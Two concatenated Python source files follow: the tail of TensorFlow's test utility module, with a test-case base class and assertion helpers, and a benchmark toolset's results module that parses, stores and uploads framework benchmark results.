# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that tests run at different times cannot pollute
    each other's environment.
    If you need multiple unique directories within a single test, you should
    use tempfile.mkdtemp as follows:
      tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
    in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
    This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
    `force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
    `use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
    the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
    Checks that |f1 - f2| <= err and asserts a test failure
    if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if that fails, traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (
path_str, type(a), path_str, type(b))
e.args = ((e.args[0] + ' : ' + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray`, or any arbitrarily nested structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray`, or any arbitrarily nested structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
    In particular, the tolerance is relaxed to 1e-3 if at least
one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
  assert graph.graph_def_versions.producer == producer_version
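# Hedged end-of-module sketch (illustrative only): combining `checkedThread`
# with the assertion helpers defined above. `ThreadedTest` and `worker` are
# placeholder names.
#
#   class ThreadedTest(TensorFlowTestCase):
#
#     def testWorkerFinishes(self):
#       results = []
#
#       def worker():
#         results.append(1 + 1)
#
#       t = self.checkedThread(target=worker)
#       t.start()
#       t.join()   # surfaces any exception raised inside worker as a failure
#       self.assertAllEqual([2], results)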
|
results.py
|
from toolset.utils.output_helper import log
import os
import subprocess
import uuid
import time
import json
import requests
import threading
import re
import math
import csv
import traceback
from datetime import datetime
# Cross-platform colored text
from colorama import Fore, Style
class Results:
def __init__(self, benchmarker):
'''
Constructor
'''
self.benchmarker = benchmarker
self.config = benchmarker.config
self.directory = os.path.join(self.config.results_root,
self.config.timestamp)
try:
os.makedirs(self.directory)
except OSError:
pass
self.file = os.path.join(self.directory, "results.json")
self.uuid = str(uuid.uuid4())
self.name = datetime.now().strftime(self.config.results_name)
self.environmentDescription = self.config.results_environment
try:
self.git = dict()
self.git['commitId'] = self.__get_git_commit_id()
self.git['repositoryUrl'] = self.__get_git_repository_url()
self.git['branchName'] = self.__get_git_branch_name()
except Exception:
#Could not read local git repository, which is fine.
self.git = None
self.startTime = int(round(time.time() * 1000))
self.completionTime = None
self.concurrencyLevels = self.config.concurrency_levels
self.pipelineConcurrencyLevels = self.config.pipeline_concurrency_levels
self.queryIntervals = self.config.query_levels
self.cachedQueryIntervals = self.config.cached_query_levels
self.frameworks = [t.name for t in benchmarker.tests]
self.duration = self.config.duration
self.rawData = dict()
self.rawData['json'] = dict()
self.rawData['db'] = dict()
self.rawData['query'] = dict()
self.rawData['fortune'] = dict()
self.rawData['update'] = dict()
self.rawData['plaintext'] = dict()
self.rawData['cached_query'] = dict()
self.completed = dict()
self.succeeded = dict()
self.succeeded['json'] = []
self.succeeded['db'] = []
self.succeeded['query'] = []
self.succeeded['fortune'] = []
self.succeeded['update'] = []
self.succeeded['plaintext'] = []
self.succeeded['cached_query'] = []
self.failed = dict()
self.failed['json'] = []
self.failed['db'] = []
self.failed['query'] = []
self.failed['fortune'] = []
self.failed['update'] = []
self.failed['plaintext'] = []
self.failed['cached_query'] = []
self.verify = dict()
#############################################################################
# PUBLIC FUNCTIONS
#############################################################################
def parse(self, tests):
'''
Parses the benchmark results: counts the git commits and significant
lines of code for each framework, then writes the aggregated
results.json file.
'''
# Run the method to get the commit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(self.file, "w") as f:
f.write(json.dumps(self.__to_jsonable(), indent=2))
def parse_test(self, framework_test, test_type):
'''
Parses the given test and test_type from the raw_file.
'''
results = dict()
results['results'] = []
stats = []
if os.path.exists(self.get_raw_file(framework_test.name, test_type)):
with open(self.get_raw_file(framework_test.name,
test_type)) as raw_data:
is_warmup = True
rawData = None
for line in raw_data:
if "Queries:" in line or "Concurrency:" in line:
is_warmup = False
rawData = None
continue
if "Warmup" in line or "Primer" in line:
is_warmup = True
continue
if not is_warmup:
if rawData is None:
rawData = dict()
results['results'].append(rawData)
if "Latency" in line:
m = re.findall(r"([0-9]+\.*[0-9]*[us|ms|s|m|%]+)",
line)
if len(m) == 4:
rawData['latencyAvg'] = m[0]
rawData['latencyStdev'] = m[1]
rawData['latencyMax'] = m[2]
if "requests in" in line:
m = re.search("([0-9]+) requests in", line)
if m is not None:
rawData['totalRequests'] = int(m.group(1))
if "Socket errors" in line:
if "connect" in line:
m = re.search("connect ([0-9]+)", line)
rawData['connect'] = int(m.group(1))
if "read" in line:
m = re.search("read ([0-9]+)", line)
rawData['read'] = int(m.group(1))
if "write" in line:
m = re.search("write ([0-9]+)", line)
rawData['write'] = int(m.group(1))
if "timeout" in line:
m = re.search("timeout ([0-9]+)", line)
rawData['timeout'] = int(m.group(1))
if "Non-2xx" in line:
m = re.search("Non-2xx or 3xx responses: ([0-9]+)",
line)
if m is not None:
rawData['5xx'] = int(m.group(1))
if "STARTTIME" in line:
m = re.search("[0-9]+", line)
rawData["startTime"] = int(m.group(0))
if "ENDTIME" in line:
m = re.search("[0-9]+", line)
rawData["endTime"] = int(m.group(0))
test_stats = self.__parse_stats(
framework_test, test_type,
rawData["startTime"], rawData["endTime"], 1)
stats.append(test_stats)
with open(
self.get_stats_file(framework_test.name, test_type) + ".json",
"w") as stats_file:
json.dump(stats, stats_file, indent=2)
return results
def parse_all(self, framework_test):
'''
Parses and reports the benchmark results for every test type of the
given framework test that produced a raw output file.
'''
for test_type in framework_test.runTests:
if os.path.exists(
self.get_raw_file(framework_test.name, test_type)):
results = self.parse_test(framework_test, test_type)
self.report_benchmark_results(framework_test, test_type,
results['results'])
def write_intermediate(self, test_name, status_message):
'''
Writes the intermediate results for the given test_name and status_message
'''
self.completed[test_name] = status_message
self.__write_results()
def set_completion_time(self):
'''
Sets the completionTime for these results and writes the results
'''
self.completionTime = int(round(time.time() * 1000))
self.__write_results()
def upload(self):
'''
Attempts to upload the results.json to the configured results_upload_uri
'''
if self.config.results_upload_uri is not None:
try:
requests.post(
self.config.results_upload_uri,
headers={'Content-Type': 'application/json'},
data=json.dumps(self.__to_jsonable(), indent=2),
timeout=300)
except Exception:
log("Error uploading results.json")
def load(self):
'''
Load the results.json file
'''
try:
with open(self.file) as f:
self.__dict__.update(json.load(f))
except (ValueError, IOError):
pass
def get_raw_file(self, test_name, test_type):
'''
Returns the output file for this test_name and test_type
Example: fw_root/results/timestamp/test_name/test_type/raw.txt
'''
path = os.path.join(self.directory, test_name, test_type, "raw.txt")
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
def get_stats_file(self, test_name, test_type):
'''
Returns the stats file name for this test_name and test_type
Example: fw_root/results/timestamp/test_name/test_type/stats.txt
'''
path = os.path.join(self.directory, test_name, test_type, "stats.txt")
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
def report_verify_results(self, framework_test, test_type, result):
'''
Used by FrameworkTest to add verification details to our results
TODO: Technically this is an IPC violation - we are accessing
the parent process' memory from the child process
'''
if framework_test.name not in self.verify.keys():
self.verify[framework_test.name] = dict()
self.verify[framework_test.name][test_type] = result
def report_benchmark_results(self, framework_test, test_type, results):
'''
Used by FrameworkTest to add benchmark data to these results
TODO: Technically this is an IPC violation - we are accessing
the parent process' memory from the child process
'''
if test_type not in self.rawData.keys():
self.rawData[test_type] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.rawData[test_type][framework_test.name] = results
# This may already be set for single-tests
if framework_test.name not in self.succeeded[test_type]:
self.succeeded[test_type].append(framework_test.name)
else:
# This may already be set for single-tests
if framework_test.name not in self.failed[test_type]:
self.failed[test_type].append(framework_test.name)
def finish(self):
'''
Finishes these results.
'''
if not self.config.parse:
# Normally you don't have to repeat the color code before each line, but
# Travis-CI seems to reset color codes on newline (see travis-ci/travis-ci#2692)
# or stream flush, so we have to ensure that the color code is printed repeatedly
log("Verification Summary",
border='=',
border_bottom='-',
color=Fore.CYAN)
for test in self.benchmarker.tests:
log(Fore.CYAN + "| {!s}".format(test.name))
